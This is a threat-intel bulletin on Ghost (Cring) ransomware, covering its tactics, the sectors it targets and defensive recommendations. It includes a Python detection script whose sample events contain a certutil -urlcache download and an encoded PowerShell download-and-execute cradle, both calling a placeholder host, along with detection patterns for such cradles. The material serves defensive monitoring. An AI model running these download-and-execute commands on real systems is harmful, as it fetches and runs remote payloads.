CGI Weekly

March 12, 2025

Ghost Ransomware continues to attack all industries

Cyber Guardian Threat Intel: Ghost Ransomware continues to evolve and target edge devices.

Date: March 11, 2025

Threat Level: High


Executive Summary:

The Ghost ransomware, also known as Cring, has surged in prominence over the past week following a joint advisory by CISA and the FBI. The malware is responsible for breaching organizations across 70 countries, exploiting vulnerabilities in Fortinet VPN appliances and other edge devices with weak security postures, particularly in critical infrastructure sectors. This ransomware variant is not new, but it has evolved with advanced evasion techniques and targeted attacks on industries with limited cybersecurity resources.


Technical Overview:

Ghost ransomware attacks are highly targeted and sophisticated, leveraging the following tactics and techniques:

  • Initial Access:
    Exploits unpatched vulnerabilities in Fortinet FortiGate VPN devices (CVE-2018-13379) to gain access. In some cases, Microsoft Exchange Server vulnerabilities are also targeted.
  • Persistence & Lateral Movement:
    Uses PowerShell scripts, certutil, and Cobalt Strike for further network infiltration and persistence.
  • Encryption & Extortion:
    Encrypts data using the AES-256 and RSA-4096 algorithms.
    Exfiltrates sensitive data for double extortion, threatening to leak it if the ransom isn't paid.
    Ransom notes demand payment in Bitcoin, typically between $50,000 and $1 million depending on the victim.


Industries & Sectors Targeted

  • Critical Infrastructure (Utilities, Energy)
  • Healthcare and Pharmaceuticals
  • Manufacturing
  • Government Agencies
  • Educational Institutions
  • Religious Organizations
  • Small-to-Medium Enterprises (SMEs)


Geographic Impact

Ghost ransomware incidents have been reported in over 70 countries, with heavy targeting in Europe, North America, and parts of Asia.


Recommendations:

Patch Immediately

  • Apply updates for Fortinet VPN appliances (CVE-2018-13379).
  • Patch Microsoft Exchange Servers and all externally facing systems.

Enforce Strong Authentication

  • Enable MFA for all users, especially remote access services.

Monitor for Suspicious Behavior

  • Watch for anomalous PowerShell execution.
  • Scan for known malicious IPs and domains.
  • Implement EDR/XDR solutions to detect and contain intrusions.
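One way to turn the "anomalous PowerShell execution" item into a concrete check against the tradecraft named in the Technical Overview (PowerShell and certutil), as an added example that is not part of this newsletter or of any vendor product: the script decodes -EncodedCommand blobs, looks for download cradles inside them, and flags certutil download switches. The event layout (host=, cmdline=, scriptblock=) and all sample records are constructed for the example, not a real log format or real telemetry.

```python
import base64
import re
# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENCODED_ARG = re.compile(r"(?i)\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
QUIET_SWITCHES = re.compile(r"(?i)\s-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|noni(?:nteractive)?)\b")
CERTUTIL_ABUSE = re.compile(r"(?i)certutil(?:\.exe)?\s.*-(?:urlcache|decode|encode)\b")
# Download-and-execute cradle terms commonly found once an encoded block is decoded.
CRADLE_TERMS = ("invoke-expression", "iex", "downloadstring", "net.webclient", "frombase64string")

def to_encoded_command(script: str) -> str:  # what PowerShell expects after -EncodedCommand
    return base64.b64encode(script.encode("utf-16-le")).decode()
def decode_encoded_command(blob: str) -> str:  # '' when not valid base64 over UTF-16LE
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

# Constructed sample events (not real telemetry), simplified from Windows 4688/4104 records; 203.0.113.0/24 is TEST-NET-3.
SAMPLE_EVENTS = [
    "4688 host=ws01 user=jdoe cmdline=notepad.exe report.txt",
    "4688 host=ws02 user=svc_backup cmdline=certutil.exe -urlcache -split -f http://203.0.113.10/s.bin C:\\Users\\Public\\s.bin",
    "4104 host=ws03 user=admin scriptblock=powershell.exe -nop -w hidden -enc "
    + to_encoded_command("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"),
    "4104 host=ws05 user=ops scriptblock=Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
]

def analyze(event: str) -> list[str]:
    """Reasons an event is suspicious; an empty list means no rule matched."""
    reasons = []
    if CERTUTIL_ABUSE.search(event):
        reasons.append("certutil download/decode")
    if QUIET_SWITCHES.search(event):
        reasons.append("hidden or non-interactive powershell")
    if m := ENCODED_ARG.search(event):
        reasons.append("encoded powershell command")
        decoded = decode_encoded_command(m.group(1))
        hits = sorted(t for t in CRADLE_TERMS if re.search(rf"\b{re.escape(t)}\b", decoded, re.I))
        if hits:
            reasons.append("decoded block contains " + ", ".join(hits))
    return reasons

def triage(events: list[str]) -> dict[str, list[str]]:
    """host -> reasons, for every event that tripped at least one rule."""
    flagged: dict[str, list[str]] = {}
    for ev in events:
        if reasons := analyze(ev):
            host = re.search(r"host=(\S+)", ev).group(1)
            flagged.setdefault(host, []).extend(reasons)
    return flagged
```

Run as `triage(SAMPLE_EVENTS)`: ws01 and ws05 stay clean, ws02 is flagged for certutil, and ws03 is flagged for the hidden window, the encoded command and the cradle terms found after decoding.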

Network Segmentation & Least Privilege

  • Isolate critical systems and reduce user privileges.

Backup & Recovery

  • Maintain offline, tested backups.
  • Verify integrity frequently.

Incident Response Plan

  • Make sure your Incident Response Plan is up to date and conduct tabletop exercises based on Ghost/Cring attack scenarios.


Key Takeaways

  • Ghost Ransomware has reemerged as a serious global threat in 2025, using highly targeted campaigns and exploiting known, unpatched vulnerabilities.
  • Victims are coerced through double extortion tactics, amplifying the damage of an already devastating attack.
  • The rapid deployment of the ransomware following initial compromise, coupled with the group's indiscriminate targeting across various sectors and geographies, makes Ghost (Cring) a particularly dangerous adversary.
  • Timely patching, proactive monitoring and threat hunting, and staying informed will help organizations defend themselves.

Cyber Guardian Intelligence - Intel Driven Defense, Always One Step Ahead.
